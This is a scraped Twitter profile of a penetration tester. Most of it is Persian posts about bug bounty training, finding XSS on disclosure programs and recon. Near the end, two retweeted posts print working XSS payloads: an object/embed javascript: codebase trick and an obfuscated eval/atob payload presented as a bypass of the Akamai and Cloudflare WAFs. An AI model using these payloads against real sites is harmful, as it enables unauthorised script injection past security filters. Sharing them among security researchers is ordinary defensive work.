Navid (@navid_rebian) 's Twitter Profile
Navid

@navid_rebian

Penetration Tester

ID: 1815987003185332224

calendar_today24-07-2024 05:47:15

176 Tweet

176 Followers

239 Following

Navid (@navid_rebian) 's Twitter Profile Photo

انگیزه ای که واسه این دوره دارم با هیچ کلمه ای قابل توصیف نیست. بریم چریکی هانت کنیم  یاشو

انگیزه ای که واسه این دوره دارم با هیچ کلمه ای قابل توصیف نیست. بریم چریکی هانت کنیم
<a href="/voorivex/"> یاشو</a>
Navid (@navid_rebian) 's Twitter Profile Photo

مطالبی که از خود کلاس یاد گرفتم یه طرف، چیزایی که از امتحان OWASP و چلنج mig-mig یاد گرفتم یه طرف دیگه خیلی کیف داد (به جز فلگ 6 که سرش زاییدم)  یاشو Hossein Maktoobian

مطالبی که از خود کلاس یاد گرفتم یه طرف، چیزایی که از امتحان OWASP و چلنج mig-mig یاد گرفتم یه طرف دیگه
خیلی کیف داد (به جز فلگ 6 که سرش زاییدم)
<a href="/voorivex/"> یاشو</a> <a href="/hmakdev/">Hossein Maktoobian</a>
Navid (@navid_rebian) 's Twitter Profile Photo

کمردرد از نظر ذهنی خیلی روم تأثیر می‌زاره. حس پیری و فرسودگی بهم دست میده. دوباره این دیسک لعنتی عود کرد و یه وری افتادم تو خونه :)

Navid (@navid_rebian) 's Twitter Profile Photo

تیر بعدی از Spotify خوردیم تعطیلات عید که نابودمون کرد. بریم واسه ادامه کار ...

تیر بعدی از Spotify خوردیم
تعطیلات عید که نابودمون کرد. بریم واسه ادامه کار ...
Navid (@navid_rebian) 's Twitter Profile Photo

بالاخره بعد 2 تا Duplicate نوبت ما هم شد 😂 چهار روز سفت و سخت خوابیدم رو یه پروگرم VDP که فقط از روش XSS دربیارم که خوشبختانه هم پیدا شد و هم تریاژ شد :)  یاشو

بالاخره بعد 2 تا Duplicate نوبت ما هم شد 😂
چهار روز سفت و سخت خوابیدم رو یه پروگرم VDP که فقط از روش XSS دربیارم که خوشبختانه هم پیدا شد و هم تریاژ شد :)

<a href="/voorivex/"> یاشو</a>
neema (@neemaaf) 's Twitter Profile Photo

رفقا من خیلی کوچیک تر از اینم که در جایگاه آموزش دهنده باشم من همچنان در به در دنبال افرادی هستم که هنوز از تجربه هاشون چیز های جدید یاد بگیرم ولی دوس داشتم تولید محتوا تو حوزه خودم رو شروع کنم( مخصوصا برای یادگیری و یاد آوری خودم) خواستم اینو توییت کنم ببینم چقدر حمایت میشه🌝

YS (@yshahinzadeh) 's Twitter Profile Photo

first time participating in NahamCon. I’ll cover a practical attack scenario I've made $50K with. Hope everything goes well for me

first time participating in NahamCon. I’ll cover a practical attack scenario I've made $50K with. Hope everything goes well for me
Navid (@navid_rebian) 's Twitter Profile Photo

تقریباً سه هفته‌ای میشه که دارم راجب wide recon مطالعه می‌کنم و متوجه شدم که خیلی‌ فراتر از اینه که فقط یه subfinder اجرا کنی. دانشی که بدست آوردم با دانشی که قبلا از narrow recon داشتم ترکیب کردم و نتیجش بعد دو سه ساعت کار کردن روی یه پروگرم vdp پنج تا xss بود.  یاشو

تقریباً سه هفته‌ای میشه که دارم راجب wide recon مطالعه می‌کنم و متوجه شدم که خیلی‌ فراتر از اینه که فقط یه subfinder اجرا کنی. دانشی که بدست آوردم با دانشی که قبلا از narrow recon داشتم ترکیب کردم و نتیجش بعد دو سه ساعت کار کردن روی یه پروگرم vdp پنج تا xss بود.
<a href="/voorivex/"> یاشو</a>
Masato Kinugawa (@kinugawamasato) 's Twitter Profile Photo

lol, this works on Firefox: <object data=# codebase=javascript:alert(document.domain)//> OR <embed src=# codebase=javascript:alert(document.domain)//>

Radman (@iarvy0x) 's Twitter Profile Photo

I just found a WAF bypass for Akamai and Cloudflare: <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>

I just found a WAF bypass for Akamai and Cloudflare:
&lt;address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x&gt;&lt;div style=scroll-snap-align:center&gt;1337&lt;/div&gt;&lt;/address&gt;